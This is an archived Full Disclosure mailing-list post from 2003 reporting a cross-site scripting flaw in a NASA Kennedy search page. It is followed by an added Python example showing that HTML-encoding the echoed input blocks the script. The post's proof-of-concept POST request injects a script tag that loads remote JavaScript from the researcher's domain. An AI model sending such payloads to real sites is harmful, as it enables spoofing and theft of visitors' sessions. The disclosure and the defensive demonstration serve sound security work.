Full Disclosure mailing list archives
More Cross Site Scripting in NASA.gov Sites
From: "Lorenzo Hernandez Garcia-Hierro" <lorenzohgh () nsrg-security com>
Date: Wed, 15 Oct 2003 01:33:44 +0200
Hi friends,

Another security hole in a nasa.gov website, another XSS:

Use this post request for proof of concept:
_________________________________

POST /search/query.asp HTTP/1.0
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/msword, application/x-shockwave-flash, application/vnd.ms-excel, application/vnd.ms-powerpoint, */*
Referer: http://www.whereeveryouare.foo
Accept-Language: en
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
Host: si.ksc.nasa.gov
Content-Length: 129
Pragma: no-cache
Cookie: ASPSESSIONID[FIRSTSESSIONSTRING]=[MYSESSION]
Connection: keep-alive
Browser reload detected...
Posting 129 bytes...
SearchString=%22%3E%3Cscript+src%3D%22http%3A%2F%2Ftest-zone.nsrg-security.com%2Fxss%2Fspoofing.js%22%3E%3C%2Fscript%3E
Action=Go
_________________________________

Best regards and remember that security is a mind status!

Greetings to all the community:
morning-wood for his arin.net greeting to me, cyrus-tc, etc.

-------------------------------
0x00->Lorenzo Hernandez Garcia-Hierro
0x01->/* not csh but sh */
0x02->$ PATH=pretending!/usr/ucb/which sense
0x03-> no sense in pretending!
__________________________________
PGP: Keyfingerprint
4ACC D892 05F9 74F1 F453 7D62 6B4E B53E 9180 5F5B
ID: 0x91805F5B
**********************************
No Secure Root Group
Security Research Team
http://www.nsrg-security.com
______________________

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html
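
Added example, not part of the original post: the posted SearchString echoed into a result page verbatim and then HTML-encoded on output, with an HTML parser reporting which script elements each page contains. The template markup, the function names and the "&" joining the two form fields are assumptions; the post shows neither the page source nor the separator.

```python
from html import escape
from html.parser import HTMLParser
from urllib.parse import parse_qs

# Form body as given in the post; the "&" between the two fields is assumed.
POSTED_BODY = (
    "SearchString=%22%3E%3Cscript+src%3D%22http%3A%2F%2Ftest-zone."
    "nsrg-security.com%2Fxss%2Fspoofing.js%22%3E%3C%2Fscript%3E&Action=Go"
)

# Hypothetical result-page fragment; the real query.asp markup is not in the post.
TEMPLATE = '<form><input type="text" name="SearchString" value="{value}"></form>'

class ScriptFinder(HTMLParser):
    """Collects the src of every <script> start tag the HTML parser sees."""

    def __init__(self):
        super().__init__()
        self.script_sources = []

    def handle_starttag(self, tag, attrs):
        if tag == "script":
            self.script_sources.append(dict(attrs).get("src"))

def search_string(body):
    """Decode the form body the way the server does before echoing it."""
    return parse_qs(body)["SearchString"][0]

def render_unencoded(value):
    """The flaw: user input is pasted into the attribute verbatim."""
    return TEMPLATE.format(value=value)

def render_encoded(value):
    """The fix: HTML-encode on output, double quotes included."""
    return TEMPLATE.format(value=escape(value, quote=True))

def injected_scripts(page):
    """Return the src values of all script elements found in the page."""
    finder = ScriptFinder()
    finder.feed(page)
    finder.close()
    return finder.script_sources

if __name__ == "__main__":
    value = search_string(POSTED_BODY)
    print("unencoded:", injected_scripts(render_unencoded(value)))
    print("encoded:  ", injected_scripts(render_encoded(value)))
```

In the unencoded page the leading `">` closes the value attribute and the input tag, so the parser sees a script element; in the encoded page the same bytes stay inside the attribute value.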